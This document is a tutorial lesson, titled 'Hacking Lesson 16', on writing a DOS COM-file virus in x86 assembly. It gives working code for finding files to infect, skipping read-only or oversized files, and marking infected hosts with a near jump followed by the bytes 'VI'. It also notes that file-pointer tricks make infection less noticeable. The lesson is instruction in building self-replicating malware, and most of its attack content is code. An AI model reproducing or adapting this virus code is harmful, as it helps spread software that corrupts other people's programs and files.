HACKING LESSON 16

If our search mechanism as a whole also uses the z flag to tell the main controlling program that it has found a file to infect (z=file found, nz=no file found) then our completed search function can be written like this:

FIND_FILE:
mov dx,OFFSET COMFILE
mov al,00000110B
mov ah,4EH ;perform search first
int 21H

FF_LOOP:
or al,al ;any possibilities found?
jnz FF_DONE ;no - exit with z reset
call FILE_OK ;yes, go check if we can infect it
jz FF_DONE ;yes - exit with z set
mov ah,4FH ;no - search for another file
int 21H
jmp FF_LOOP ;go back up and see what happened

FF_DONE:
ret ;return to main virus control routine

Study this search routine carefully. If it tells the virus to infect a program which does not have room for the virus, then the newly infected program may be inadvertently ruined. A good FILE_OK routine must perform two checks:

(1) It must check a file to see if it is too long to attach the virus to, and
(2) It must check to see if the virus is already there.

If the file is short enough, and the virus is not present, FILE_OK should return a “go ahead” to the search routine.

On entry to FILE_OK, the search function has set up the DTA with 43 bytes of information about the file to check, including its size and its name. Suppose that we have defined two labels, FSIZE and FNAME in the DTA to access the file size and file name respectively. Then checking the file size to see if the virus will fit is a simple matter. Since the file size of a COM file is always less than 64 kilobytes, we may load the size of the file we want to infect into the ax register:

mov ax,WORD PTR [FSIZE]

Next we add the number of bytes the virus will have to add to this file, plus 100H. The 100H is needed because DOS will also allocate room for the PSP, and load the program file at offset 100H. To determine the number of bytes the virus will need automatically, we simply put a label VIRUS at the start of the virus code we are writing and a label END_VIRUS at the end of it, and take the difference. If we add these bytes to ax, and ax overflows, then the file which the search routine has found is too large to permit a successful infection. An overflow will cause the carry flag c to be set, so the file size check will look something like this:

FILE_OK:
mov ax,WORD PTR [FSIZE]
add ax,OFFSET END_VIRUS - OFFSET VIRUS + 100H
jc BAD_FILE
..
GOOD_FILE:
xor al,al
ret

BAD_FILE:
mov al,1
or al,al
ret

The next problem that the FILE_OK routine must deal with is how to avoid infecting a file that has already been infected. This can only be accomplished if the virus has some understanding of how it goes about infecting a file. We have replaced the first few bytes of the host program with a jump to the viral code. Thus, the FILE_OK procedure can go out and read the file which is a candidate for infection to determine whether its first instruction is a jump. If it isn’t, then the virus obviously has not infected that file yet. There are two kinds of jump instructions which might be encountered in a COM file, known as a near jump and a short jump. The virus we create here will always use a near jump to gain control when the program starts. Since a short jump only has a range of 128 bytes, we could not use it to infect a COM file larger than 128 bytes. The near jump allows a range of 64 kilobytes. Thus it can always be used to jump from the beginning of a COM file to the virus, at the end of the program, no matter how big the COM file is (as long as it is really a valid COM file). A near jump is represented in machine language with the byte E9 Hex, followed by two bytes which tell the CPU how far to jump.

Thus, our first test to see if infection has already occurred is to check to see if the first byte in the file is E9 Hex. If it is anything else, the virus is clear to go ahead and infect. Looking for E9 Hex is not enough though. Many COM files are designed so the first instruction is a jump to begin with. Thus the virus may encounter files which start with an E9 Hex even though they have never been infected. The virus cannot assume that a file has been infected just because it starts with an E9. It must go farther. It must have a way of telling whether a file has been infected even when it does start with E9. If we do not incorporate this extra step into the FILE_OK routine, the virus will pass by many good COM files which it could infect because it thinks they have already been infected. While failure to incorporate such a feature into FILE_OK will not cause the virus to fail, it will limit its functionality.

One way to make this test simple and yet very reliable is to change a couple more bytes than necessary at the beginning of the host program. The near jump will require three bytes, so we might take two more, and encode them in a unique way so the virus can be pretty sure the file is infected if those bytes are properly encoded. The simplest scheme is to just set them to some fixed value. We’ll use the two characters “VI” here. Thus, when a file begins with a near jump followed by the bytes “V”=56H and “I”=49H, we can be almost positive that the virus is there, and otherwise it is not. To read the first five bytes of the file, we open it with DOS Interrupt 21H function 3D Hex. This function requires us to set ds:dx to point to the file name (FNAME) and to specify the access rights which we desire in the al register. In the FILE_OK routine the virus only needs to read the file. Yet there we will try to open it with read/write access, rather than read-only access. If the file attribute is set to read-only, an attempt to open in read/write mode will result in an error (which DOS signals by setting the carry flag on return from INT 21H). This will allow the virus to detect read-only files and avoid them, since the virus must write to a file to infect it. It is much better to find out that the file is read-only here, in the search routine, than to assume the file is good to infect and then have the virus fail when it actually attempts infection. Thus, when opening the file, we set al = 2 to tell DOS to open it in read/write mode. If DOS opens the file successfully, it returns a filehandle in ax. This is just a number which DOS uses to refer to the file in all future requests. The code to open the file looks like this:

mov ax,3D02H
mov dx,OFFSET FNAME
int 21H
jc BAD_FILE

Once the file is open, the virus may perform the actual read operation, DOS function 3F Hex. To read a file, one must set bx equal to the file handle number and cx to the number of bytes to read from the file. Also ds:dx must be set to the location in memory where the data read from the file should be stored (which we will call START_IMAGE). DOS stores an internal file pointer for each open file which keeps track of where in the file DOS is going to do its reading and writing from. The file pointer is just a four byte long integer, which specifies which byte in the selected file a read or write operation refers to. This file pointer starts out pointing to the first byte in the file (file pointer = 0), and it is automatically advanced by DOS as the file is read from or written to. Since it starts at the beginning of the file, and the FILE_OK procedure must read the first five bytes of the file, there is no need to touch the file pointer right now. However, you should be aware that it is there, hidden away by DOS. It is an essential part of any file reading and writing we may want to do. When it comes time for the virus to infect the file, it will have to modify this file pointer to grab a few bytes here and put them there, etc. Doing that is much faster (and hence, less noticeable) than reading a whole file into memory, manipulating it in memory, and then writing it back to disk. For now, though, the actual reading of the file is fairly simple. It looks like this:

mov bx,ax ;put handle in bx
mov cx,5 ;prepare to read 5 bytes
mov dx,OFFSET START_IMAGE ;to START_IMAGE
mov ah,3FH
int 21H ;go do it

We will not worry about the possibility of an error in reading five bytes here. The only possible error is that the file is not long enough to read five bytes, and we are pretty safe in assuming that most COM files will have more than four bytes in them. Finally, to close the file, we use DOS function 3E Hex and put the file handle in bx. Putting it all together, the FILE_OK procedure looks like this:

FILE_OK:
mov dx,OFFSET FNAME ;first open the file
mov ax,3D02H ;r/w access open file
int 21H
jc FOK_NZEND ;error opening file - file can’t be used
mov bx,ax ;put file handle in bx
push bx ;and save it on the stack
mov cx,5 ;read 5 bytes at the start of the program
mov dx,OFFSET START_IMAGE ;and store them here
mov ah,3FH ;DOS read function
int 21H
pop bx ;restore the file handle
mov ah,3EH
int 21H ;and close the file
mov ax,WORD PTR [FSIZE] ;get the file size of the host
add ax,OFFSET ENDVIRUS - OFFSET VIRUS ;and add size of virus to it
jc FOK_NZEND ;c set if ax overflows (size > 64k)
cmp BYTE PTR [START_IMAGE],0E9H ;size ok-is first byte a near jmp?
jnz FOK_ZEND ;not near jmp, file must be ok, exit with z
cmp WORD PTR [START_IMAGE+3],4956H ;ok, is ’VI’ in positions 3 & 4?
jnz FOK_ZEND ;no, file can be infected, return with Z set

FOK_NZEND:
mov al,1 ;we’d better not infect this file
or al,al ;so return with z reset
ret

FOK_ZEND:
xor al,al ;ok to infect, return with z set
ret

This completes our discussion of the search mechanism for the virus.
